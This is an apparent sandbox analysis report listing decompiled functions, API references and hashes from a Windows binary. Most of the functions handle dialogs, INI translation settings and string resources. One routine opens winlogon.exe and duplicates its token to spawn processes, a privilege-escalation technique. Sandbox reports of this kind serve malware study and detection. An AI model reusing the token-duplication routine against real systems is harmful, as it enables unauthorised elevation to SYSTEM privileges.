                                                                                                        • GetWindowRect.USER32 ref: 00404E07
                                                                                                        • GetParent.USER32(?), ref: 00404E12
                                                                                                        • GetWindowRect.USER32 ref: 00404E2F
                                                                                                        • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 2163313125-0
                                                                                                        • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                        • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                        • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                        • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                        0x0040639c
                                                                                                        0x004063a4
                                                                                                        0x004063b2
                                                                                                        0x004063c2
                                                                                                        0x004063d3
                                                                                                        0x004063dc
                                                                                                        0x004063eb
                                                                                                        0x004063f0
                                                                                                        0x00406401
                                                                                                        0x00000000
                                                                                                        0x0040641e
                                                                                                        0x0040641f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                        • wcscpy.MSVCRT ref: 004063B2
                                                                                                        • wcscpy.MSVCRT ref: 004063C2
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                          • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                        • API String ID: 3176057301-2039793938
                                                                                                        • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                        • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                        • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                        • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 16%
                                                                                                        			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                        0x0040adf6
                                                                                                        0x0040adf8
                                                                                                        0x0040adfa
                                                                                                        0x0040adfb
                                                                                                        0x0040adfb
                                                                                                        0x0040ae02
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040ae04
                                                                                                        0x0040ae05
                                                                                                        0x0040ae6d
                                                                                                        0x0040ae6e
                                                                                                        0x0040ae73
                                                                                                        0x0040ae76
                                                                                                        0x0040ae7f
                                                                                                        0x0040ae83
                                                                                                        0x0040ae86
                                                                                                        0x00000000
                                                                                                        0x0040ae86
                                                                                                        0x0040ae8f
                                                                                                        0x0040ae0c
                                                                                                        0x0040ae10
                                                                                                        0x0040ae1e
                                                                                                        0x0040ae3b
                                                                                                        0x0040ae4a
                                                                                                        0x0040ae65
                                                                                                        0x0040ae7a
                                                                                                        0x0040ae7e
                                                                                                        0x0040ae67
                                                                                                        0x0040ae67
                                                                                                        0x0040ae68
                                                                                                        0x00000000
                                                                                                        0x0040ae68
                                                                                                        0x0040ae4c
                                                                                                        0x0040ae4c
                                                                                                        0x0040ae4e
                                                                                                        0x00000000
                                                                                                        0x0040ae4e
                                                                                                        0x0040ae3d
                                                                                                        0x0040ae3d
                                                                                                        0x0040ae3f
                                                                                                        0x0040ae53
                                                                                                        0x0040ae54
                                                                                                        0x0040ae59
                                                                                                        0x0040ae5c
                                                                                                        0x0040ae5c
                                                                                                        0x0040ae20
                                                                                                        0x0040ae28
                                                                                                        0x0040ae2d
                                                                                                        0x0040ae30
                                                                                                        0x0040ae30
                                                                                                        0x0040ae12
                                                                                                        0x0040ae12
                                                                                                        0x0040ae13
                                                                                                        0x00000000
                                                                                                        0x0040ae13
                                                                                                        0x00000000
                                                                                                        0x0040ae10

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                        • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                        • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                        • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                        • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                        0x004041f9
                                                                                                        0x00404205
                                                                                                        0x00404208
                                                                                                        0x00404217
                                                                                                        0x0040421e
                                                                                                        0x00404236
                                                                                                        0x0040423f
                                                                                                        0x0040424a
                                                                                                        0x0040425f
                                                                                                        0x0040426b
                                                                                                        0x0040426e
                                                                                                        0x0040426e
                                                                                                        0x00404275
                                                                                                        0x004043be
                                                                                                        0x004043ce
                                                                                                        0x004043d0
                                                                                                        0x004043d3
                                                                                                        0x004043da
                                                                                                        0x004043da
                                                                                                        0x004043c0
                                                                                                        0x004043c3
                                                                                                        0x004043c3
                                                                                                        0x0040427b
                                                                                                        0x0040428c
                                                                                                        0x0040428f
                                                                                                        0x00404295
                                                                                                        0x004042a5
                                                                                                        0x004042b8
                                                                                                        0x004042cb
                                                                                                        0x004042de
                                                                                                        0x004042f1
                                                                                                        0x00404304
                                                                                                        0x00404317
                                                                                                        0x0040432a
                                                                                                        0x0040433d
                                                                                                        0x00404350
                                                                                                        0x00404363
                                                                                                        0x00404376
                                                                                                        0x00404389
                                                                                                        0x0040439c
                                                                                                        0x004043a4
                                                                                                        0x004043af
                                                                                                        0x004043b5
                                                                                                        0x004043b5
                                                                                                        0x004043f5

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040421E
                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                        • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                          • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                          • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                          • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                        • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                        • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                        • String ID: $
                                                                                                        • API String ID: 2142561256-3993045852
                                                                                                        • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                        • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                        • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                        • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 55%
                                                                                                        			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                        0x00405b81
                                                                                                        0x00405b88
                                                                                                        0x00405b8a
                                                                                                        0x00405b8a
                                                                                                        0x00405b8f
                                                                                                        0x00405b96
                                                                                                        0x00405b9b
                                                                                                        0x00405bad
                                                                                                        0x00405bad
                                                                                                        0x00405b9d
                                                                                                        0x00405b9d
                                                                                                        0x00405ba8
                                                                                                        0x00405bab
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405bab
                                                                                                        0x00405be9
                                                                                                        0x00405be9
                                                                                                        0x00405baf
                                                                                                        0x00405bb1
                                                                                                        0x00405ce2
                                                                                                        0x00405ce2
                                                                                                        0x00405bb7
                                                                                                        0x00405bbd
                                                                                                        0x00405bf6
                                                                                                        0x00405c4b
                                                                                                        0x00405c4c
                                                                                                        0x00405c52
                                                                                                        0x00405c53
                                                                                                        0x00000000
                                                                                                        0x00405bf8
                                                                                                        0x00405c02
                                                                                                        0x00405c0e
                                                                                                        0x00405c13
                                                                                                        0x00405c18
                                                                                                        0x00405c2c
                                                                                                        0x00405c2e
                                                                                                        0x00405c3b
                                                                                                        0x00405c3c
                                                                                                        0x00405c42
                                                                                                        0x00000000
                                                                                                        0x00405c1a
                                                                                                        0x00405c25
                                                                                                        0x00405c2a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405c2a
                                                                                                        0x00405c18
                                                                                                        0x00405bbf
                                                                                                        0x00405bc0
                                                                                                        0x00405bcd
                                                                                                        0x00405bce
                                                                                                        0x00405bd7
                                                                                                        0x00405c58
                                                                                                        0x00405c5f
                                                                                                        0x00405c61
                                                                                                        0x00405c61
                                                                                                        0x00405c63
                                                                                                        0x00405cdb
                                                                                                        0x00405cdb
                                                                                                        0x00405c65
                                                                                                        0x00405c65
                                                                                                        0x00405c74
                                                                                                        0x00000000
                                                                                                        0x00405c84
                                                                                                        0x00405c8a
                                                                                                        0x00405c8d
                                                                                                        0x00405c99
                                                                                                        0x00405caf
                                                                                                        0x00405cbd
                                                                                                        0x00405cc8
                                                                                                        0x00405cd4
                                                                                                        0x00405cd9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cd9
                                                                                                        0x00405c74
                                                                                                        0x00405c63
                                                                                                        0x00405ce6

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                        • wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                          • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                        • wcslen.MSVCRT ref: 00405C20
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                        • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                        • memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                        • String ID: strings
                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                        • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                        • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                        • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                        • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                        0x00401e59
                                                                                                        0x00401e5c
                                                                                                        0x00401e64
                                                                                                        0x00401e67
                                                                                                        0x00401ef9
                                                                                                        0x00401e6d
                                                                                                        0x00401e70
                                                                                                        0x00401e76
                                                                                                        0x00401e79
                                                                                                        0x00401e7e
                                                                                                        0x00401e83
                                                                                                        0x00401e92
                                                                                                        0x00401e85
                                                                                                        0x00401e8e
                                                                                                        0x00401e8e
                                                                                                        0x00401e96
                                                                                                        0x00401ee6
                                                                                                        0x00401e98
                                                                                                        0x00401e9b
                                                                                                        0x00401e9e
                                                                                                        0x00401ea3
                                                                                                        0x00401ea8
                                                                                                        0x00401ebb
                                                                                                        0x00401eaa
                                                                                                        0x00401eb7
                                                                                                        0x00401eb7
                                                                                                        0x00401ebf
                                                                                                        0x00401ed3
                                                                                                        0x00401ec1
                                                                                                        0x00401ec7
                                                                                                        0x00401ec9
                                                                                                        0x00401ec9
                                                                                                        0x00401ed8
                                                                                                        0x00401ed8
                                                                                                        0x00401eeb
                                                                                                        0x00401eeb
                                                                                                        0x00401f01

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                          • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                        • String ID: winlogon.exe
                                                                                                        • API String ID: 1315556178-961692650
                                                                                                        • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                        • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                        • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                        • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                        0x00405241
                                                                                                        0x00405250
                                                                                                        0x00405257
                                                                                                        0x0040525f
                                                                                                        0x00405262
                                                                                                        0x00405265
                                                                                                        0x00405268
                                                                                                        0x0040526f
                                                                                                        0x0040526f
                                                                                                        0x00405277
                                                                                                        0x00405277
                                                                                                        0x0040527a
                                                                                                        0x0040527f
                                                                                                        0x00405284
                                                                                                        0x00405285
                                                                                                        0x00405291
                                                                                                        0x00405296
                                                                                                        0x004052a9
                                                                                                        0x004052b3
                                                                                                        0x004052b7
                                                                                                        0x004052bc
                                                                                                        0x004052ca
                                                                                                        0x004052d2
                                                                                                        0x004052d5
                                                                                                        0x004052d8
                                                                                                        0x004052d8
                                                                                                        0x004052db
                                                                                                        0x004052db
                                                                                                        0x004052e1
